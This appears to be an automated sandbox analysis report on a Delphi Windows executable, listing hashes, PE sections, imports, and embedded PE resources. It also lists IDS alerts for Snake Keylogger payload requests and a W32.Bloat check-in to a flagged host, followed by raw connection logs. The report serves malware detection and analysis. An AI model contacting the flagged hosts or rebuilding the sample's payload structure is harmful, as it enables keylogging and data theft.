                                                                                            SHA-256:A256FCEAFB82CC46994491866894D85545FC0EF1B3AA67EBA9123820057CE6F3
                                                                                            SHA-512:3DB5E34E084B9072D51B8C89ABCBDF794E3ACFC53F6369990B37E8F0F31D34527CC8784949E6435B227BFBF8EDFB8BF3AAC1A53AA1337D71978F5868F31BEC2B
                                                                                            Malicious:false
                                                                                            Preview:regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmRU..L]..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe
                                                                                            File Type:Microsoft HTML Help Project
                                                                                            Category:dropped
                                                                                            Size (bytes):193
                                                                                            Entropy (8bit):4.113030939932765
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:1W4M4lqHj4yQltkkkkkkkkkkkkkkkkkkkkkkkkkov1ECN+CDktjkkkkkkkkkkkkI:U4lqHj4ZOCN+CDkbpKVyYWyn
                                                                                            MD5:72F2D357120F95C1E725C22915FE95E1
                                                                                            SHA1:2DC88926E0F7D12F4EEBCE672A865E1D43237DA1
                                                                                            SHA-256:AA99B989A67FCD5A7503102752C8B2ED339EC3011D437FCFBEDB1C53EE7D639F
                                                                                            SHA-512:534FC6DD52C3ACE8576F8A74E2211836AB15EF5B22323C370406D6B9A85AB528601DF797E4105F6924224F172048772A56C4D376ADB58C8035F6151629FAE89B
                                                                                            Malicious:false
                                                                                            Preview:[Options]..Wrap=0..ShowStatusBar=0..ShowRuler=0..Units=0..Maximized=0..FrameRect=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..PageMargin=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..PrintPageNum=0..DefaultFormat=5..
                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Entropy (8bit):7.9488402694147355
                                                                                            TrID:
                                                                                            • Win32 Executable (generic) a (10002005/4) 93.21%
                                                                                            • Win32 Executable Borland Delphi 7 (665061/41) 6.20%
                                                                                            • InstallShield setup (43055/19) 0.40%
                                                                                            • Win32 Executable Delphi generic (14689/80) 0.14%
                                                                                            • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                            File name:file.exe
                                                                                            File size:6'490'624 bytes
                                                                                            MD5:e819c37952e89ff0f473fa9b59cd771d
                                                                                            SHA1:de2a344ed3a2b1f4e0fbd4e684170db56903763e
                                                                                            SHA256:05f954e37982086a48a222726b8134fbef0caa78dbe1b66a3d4479b712d12012
                                                                                            SHA512:1e3eff7391308a5161b75ab47ef29178a53ce08693c63fd08f5f1443ceeed87c3b4d3779265d669a91af0192eb556913bcbf77b825678580e44fceeb3c76d148
                                                                                            SSDEEP:196608:jLb7wqheSVYK/bua/BlWWnuVhsus8nm+q42:j/8qgSmIbr/Asb8nmFD
                                                                                            TLSH:7B662322F2C29137D1736A3C9C6B92A9982ABE512E38794B3BF51D4C5F3D7412C642D3
                                                                                            File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                            Icon Hash:878fd7f3b9353593
                                                                                            Entrypoint:0x49ab80
                                                                                            Entrypoint Section:CODE
                                                                                            Digitally signed:false
                                                                                            Imagebase:0x400000
                                                                                            Subsystem:windows gui
                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                            DLL Characteristics:
                                                                                            Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:
                                                                                            OS Version Major:4
                                                                                            OS Version Minor:0
                                                                                            File Version Major:4
                                                                                            File Version Minor:0
                                                                                            Subsystem Version Major:4
                                                                                            Subsystem Version Minor:0
                                                                                            Import Hash:332f7ce65ead0adfb3d35147033aabe9
                                                                                            Instruction
                                                                                            push ebp
                                                                                            mov ebp, esp
                                                                                            add esp, FFFFFFF0h
                                                                                            mov eax, 0049A778h
                                                                                            call 00007F623920F66Dh
                                                                                            mov eax, dword ptr [0049DBCCh]
                                                                                            mov eax, dword ptr [eax]
                                                                                            call 00007F6239262FB5h
                                                                                            mov eax, dword ptr [0049DBCCh]
                                                                                            mov eax, dword ptr [eax]
                                                                                            mov edx, 0049ABE0h
                                                                                            call 00007F6239262BB4h
                                                                                            mov ecx, dword ptr [0049DBDCh]
                                                                                            mov eax, dword ptr [0049DBCCh]
                                                                                            mov eax, dword ptr [eax]
                                                                                            mov edx, dword ptr [00496590h]
                                                                                            call 00007F6239262FA4h
                                                                                            mov eax, dword ptr [0049DBCCh]
                                                                                            mov eax, dword ptr [eax]
                                                                                            call 00007F6239263018h
                                                                                            call 00007F623920D14Bh
                                                                                            add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa0000 | 0x2a42 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb0000 | 0x586088 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xa5000 | 0xa980 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0xa4018 | 0x21 | .rdata
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xa4000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
CODE | 0x1000 | 0x99bec | 0x99c00 | 33fbe30e8a64654287edd1bf05ae7c8c | False | 0.5141641260162602 | data | 6.572957870355296 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA | 0x9b000 | 0x2e54 | 0x3000 | 1f5e19e7d20c1d128443d738ac7bc610 | False | 0.453125 | data | 4.854620797809023 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS | 0x9e000 | 0x11e5 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0xa0000 | 0x2a42 | 0x2c00 | 21ff53180b390dc06e3a1adf0e57a073 | False | 0.3537819602272727 | data | 4.919333216027082 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0xa3000 | 0x10 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0xa4000 | 0x39 | 0x200 | a92cf494c617731a527994013429ad97 | False | 0.119140625 | MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "J" | 0.7846201577093705 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc | 0xa5000 | 0xa980 | 0xaa00 | dcd1b1c3f3d28d444920211170d1e8e6 | False | 0.5899816176470588 | data | 6.674124985579511 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc | 0xb0000 | 0x586088 | 0x586200 | 633bb7b0bcb200e87057c548cdcb5b10 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_CURSOR | 0xb0dc8 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | | | 0.38636363636363635 |
| RT_CURSOR | 0xb0efc | 0x134 | data | | | 0.4642857142857143 |
| RT_CURSOR | 0xb1030 | 0x134 | data | | | 0.4805194805194805 |
| RT_CURSOR | 0xb1164 | 0x134 | data | | | 0.38311688311688313 |
| RT_CURSOR | 0xb1298 | 0x134 | data | | | 0.36038961038961037 |
| RT_CURSOR | 0xb13cc | 0x134 | data | | | 0.4090909090909091 |
| RT_CURSOR | 0xb1500 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | | | 0.4967532467532468 |
| RT_BITMAP | 0xb1634 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.43103448275862066 |
| RT_BITMAP | 0xb1804 | 0x1e4 | Device independent bitmap graphic, 36 x 19 x 4, image size 380 | | | 0.46487603305785125 |
| RT_BITMAP | 0xb19e8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.43103448275862066 |
| RT_BITMAP | 0xb1bb8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.39870689655172414 |
| RT_BITMAP | 0xb1d88 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.4245689655172414 |
| RT_BITMAP | 0xb1f58 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.5021551724137931 |
| RT_BITMAP | 0xb2128 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.5064655172413793 |
| RT_BITMAP | 0xb22f8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.39655172413793105 |
| RT_BITMAP | 0xb24c8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.5344827586206896 |
| RT_BITMAP | 0xb2698 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.39655172413793105 |
| RT_BITMAP | 0xb2868 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 | | | 0.4870689655172414 |
| RT_ICON | 0xb2950 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | | | 0.07223264540337711 |
| RT_ICON | 0xb39f8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 8192 | Turkish | Turkey | 0.2101313320825516 |
| RT_DIALOG | 0xb4aa0 | 0x52 | data | | | 0.7682926829268293 |
| RT_STRING | 0xb4af4 | 0x358 | data | | | 0.3796728971962617 |
| RT_STRING | 0xb4e4c | 0x428 | data | | | 0.37406015037593987 |
| RT_STRING | 0xb5274 | 0x3a4 | data | | | 0.40879828326180256 |
| RT_STRING | 0xb5618 | 0x3bc | data | | | 0.33472803347280333 |
| RT_STRING | 0xb59d4 | 0x2d4 | data | | | 0.4654696132596685 |
| RT_STRING | 0xb5ca8 | 0x334 | data | | | 0.42804878048780487 |
| RT_STRING | 0xb5fdc | 0x42c | data | | | 0.42602996254681647 |
| RT_STRING | 0xb6408 | 0x1f0 | data | | | 0.4213709677419355 |
| RT_STRING | 0xb65f8 | 0x1c0 | data | | | 0.44419642857142855 |
| RT_STRING | 0xb67b8 | 0xdc | data | | | 0.6 |
| RT_STRING | 0xb6894 | 0x320 | data | | | 0.45125 |
| RT_STRING | 0xb6bb4 | 0xd8 | data | | | 0.5879629629629629 |
| RT_STRING | 0xb6c8c | 0x118 | data | | | 0.5678571428571428 |
| RT_STRING | 0xb6da4 | 0x268 | data | | | 0.4707792207792208 |
| RT_STRING | 0xb700c | 0x3f8 | data | | | 0.37598425196850394 |
| RT_STRING | 0xb7404 | 0x378 | data | | | 0.41103603603603606 |
| RT_STRING | 0xb777c | 0x380 | data | | | 0.35379464285714285 |
| RT_STRING | 0xb7afc | 0x374 | data | | | 0.4061085972850679 |
| RT_STRING | 0xb7e70 | 0xe0 | data | | | 0.5535714285714286 |
| RT_STRING | 0xb7f50 | 0xbc | data | | | 0.526595744680851 |
| RT_STRING | 0xb800c | 0x368 | data | | | 0.40940366972477066 |
| RT_STRING | 0xb8374 | 0x3fc | data | | | 0.34901960784313724 |
| RT_STRING | 0xb8770 | 0x2fc | data | | | 0.36649214659685864 |
| RT_STRING | 0xb8a6c | 0x354 | data | | | 0.31572769953051644 |
| RT_RCDATA | 0xb8dc0 | 0x44 | data | | | 0.8676470588235294 |
| RT_RCDATA | 0xb8e04 | 0x10 | data | | | 1.5 |
| RT_RCDATA | 0xb8e14 | 0x574358 | PE32 executable (GUI) Intel 80386, for MS Windows | | | 0.9792976379394531 |
| RT_RCDATA | 0x62d16c | 0x3 | ASCII text, with no line terminators | Turkish | Turkey | 3.6666666666666665 |
| RT_RCDATA | 0x62d170 | 0x3c00 | PE32 executable (DLL) (GUI) Intel 80386, for MS Windows | Turkish | Turkey | 0.54296875 |
| RT_RCDATA | 0x630d70 | 0x64c | data | | | 0.5998759305210918 |
| RT_RCDATA | 0x6313bc | 0x153 | Delphi compiled form 'TFormVir' | | | 0.7522123893805309 |
| RT_RCDATA | 0x631510 | 0x47d3 | Microsoft Excel 2007+ | Turkish | Turkey | 0.8675150921846957 |
| RT_GROUP_CURSOR | 0x635ce4 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.25 |
| RT_GROUP_CURSOR | 0x635cf8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.25 |
| RT_GROUP_CURSOR | 0x635d0c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3 |
| RT_GROUP_CURSOR | 0x635d20 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3 |
| RT_GROUP_CURSOR | 0x635d34 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3 |
| RT_GROUP_CURSOR | 0x635d48 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3 |
| RT_GROUP_CURSOR | 0x635d5c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3 |
| RT_GROUP_ICON | 0x635d70 | 0x14 | data | Turkish | Turkey | 1.1 |
| RT_VERSION | 0x635d84 | 0x304 | data | Turkish | Turkey | 0.42875647668393785 |

| DLL | Import |
|---|---|
| kernel32.dll | DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryA, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCurrentDirectoryA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, ExitThread, CreateThread, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle |
| user32.dll | GetKeyboardType, LoadStringA, MessageBoxA, CharNextA |
| advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey |
| oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen |
| kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA |
| advapi32.dll | RegSetValueExA, RegQueryValueExA, RegOpenKeyExA, RegNotifyChangeKeyValue, RegFlushKey, RegDeleteValueA, RegCreateKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA, GetUserNameA, AdjustTokenPrivileges |
| kernel32.dll | lstrcpyA, WritePrivateProfileStringA, WriteFile, WaitForSingleObject, WaitForMultipleObjects, VirtualQuery, VirtualAlloc, UpdateResourceA, UnmapViewOfFile, TerminateProcess, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetFileAttributesA, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, RemoveDirectoryA, ReadFile, OpenProcess, OpenMutexA, MultiByteToWideChar, MulDiv, MoveFileA, MapViewOfFile, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTimeZoneInformation, GetTickCount, GetThreadLocale, GetTempPathA, GetTempFileNameA, GetSystemInfo, GetSystemDirectoryA, GetStringTypeExA, GetStdHandle, GetProcAddress, GetPrivateProfileStringA, GetModuleHandleA, GetModuleFileNameA, GetLogicalDrives, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeThread, GetDriveTypeA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetComputerNameA, GetCPInfo, GetACP, FreeResource, InterlockedIncrement, InterlockedExchange, InterlockedDecrement, FreeLibrary, FormatMessageA, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumCalendarInfoA, EnterCriticalSection, EndUpdateResourceA, DeleteFileA, DeleteCriticalSection, CreateThread, CreateProcessA, CreatePipe, CreateMutexA, CreateFileMappingA, CreateFileA, CreateEventA, CreateDirectoryA, CopyFileA, CompareStringA, CloseHandle, BeginUpdateResourceA |
| version.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA |
| gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt |
| user32.dll | CreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, ToAsciiEx, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MsgWaitForMultipleObjects, MessageBoxA, MapWindowPoints, MapVirtualKeyExA, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextLengthA, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout |
| ole32.dll | CLSIDFromString |
| kernel32.dll | Sleep |
| oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit |
| ole32.dll | CLSIDFromProgID, CoCreateInstance, CoUninitialize, CoInitialize |
| oleaut32.dll | GetErrorInfo, SysFreeString |
| comctl32.dll | ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create |
| shell32.dll | ShellExecuteExA, ExtractIconExW |
| wininet.dll | InternetGetConnectedState, InternetReadFile, InternetOpenUrlA, InternetOpenA, InternetCloseHandle |
| shell32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHGetMalloc, SHGetDesktopFolder |
| advapi32.dll | OpenSCManagerA, CloseServiceHandle |
| wsock32.dll | WSACleanup, WSAStartup, gethostname, gethostbyname, inet_ntoa |
| netapi32.dll | Netbios |

| Language of compilation system | Country where language is spoken | Map |
|---|---|---|
| Turkish | Turkey | |

| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-01-02T20:29:37.136706+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.9 | 49788 | 172.217.18.14 | 443 | TCP |
| 2025-01-02T20:29:37.224164+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.9 | 49789 | 172.217.18.14 | 443 | TCP |
| 2025-01-02T20:29:37.480368+0100 | 2832617 | ETPRO MALWARE W32.Bloat-A Checkin | 1 | 192.168.2.9 | 49797 | 69.42.215.252 | 80 | TCP |
| 2025-01-02T20:29:38.412011+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.9 | 49802 | 172.217.18.14 | 443 | TCP |
| 2025-01-02T20:29:38.423454+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.9 | 49804 | 172.217.18.14 | 443 | TCP |
| 2025-01-02T20:29:39.478865+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.9 | 49814 | 172.217.18.14 | 443 | TCP |
| 2025-01-02T20:29:39.492141+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.9 | 49813 | 172.217.18.14 | 443 | TCP |
| 2025-01-02T20:29:40.531218+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.9 | 49825 | 172.217.18.14 | 443 | TCP |
| 2025-01-02T20:29:40.532057+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.9 | 49824 | 172.217.18.14 | 443 | TCP |
| 2025-01-02T20:29:41.980642+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.9 | 49844 | 172.217.18.14 | 443 | TCP |
| 2025-01-02T20:29:42.044430+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.9 | 49842 | 172.217.18.14 | 443 | TCP |
| 2025-01-02T20:29:43.063109+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.9 | 49855 | 172.217.18.14 | 443 | TCP |
| 2025-01-02T20:29:43.113496+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.9 | 49856 | 172.217.18.14 | 443 | TCP |
| 2025-01-02T20:29:44.264089+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.9 | 49865 | 172.217.18.14 | 443 | TCP |
| 2025-01-02T20:29:44.267953+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.9 | 49868 | 172.217.18.14 | 443 | TCP |
| 2025-01-02T20:29:45.869946+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.9 | 49890 | 172.217.18.14 | 443 | TCP |
| 2025-01-02T20:29:45.891107+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.9 | 49891 | 172.217.18.14 | 443 | TCP |
| 2025-01-02T20:29:47.000058+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.9 | 49902 | 172.217.18.14 | 443 | TCP |
| 2025-01-02T20:29:47.054328+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.9 | 49901 | 172.217.18.14 | 443 | TCP |
| 2025-01-02T20:29:48.053490+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.9 | 49910 | 172.217.18.14 | 443 | TCP |
| 2025-01-02T20:29:48.136029+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.9 | 49912 | 172.217.18.14 | 443 | TCP |

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                            Jan 2, 2025 20:29:37.157670975 CET49803443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:29:37.157681942 CET44349803216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:29:37.224150896 CET44349789172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:29:37.224324942 CET49789443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:29:37.224344015 CET44349789172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:29:37.224632978 CET49789443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:29:37.224632978 CET49789443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:29:37.224678040 CET44349789172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:29:37.224797964 CET49789443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:29:37.224801064 CET44349789172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:29:37.225294113 CET49789443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:29:37.225395918 CET49804443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:29:37.225444078 CET44349804172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:29:37.225464106 CET49805443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:29:37.225495100 CET44349805216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:29:37.225516081 CET49804443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:29:37.225542068 CET49805443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:29:37.225786924 CET49804443192.168.2.9172.217.18.14
                                                                                            Jan 2, 2025 20:29:37.225801945 CET44349804172.217.18.14192.168.2.9
                                                                                            Jan 2, 2025 20:29:37.225845098 CET49805443192.168.2.9216.58.206.65
                                                                                            Jan 2, 2025 20:29:37.225858927 CET44349805216.58.206.65192.168.2.9
                                                                                            Jan 2, 2025 20:29:37.479986906 CET804979769.42.215.252192.168.2.9
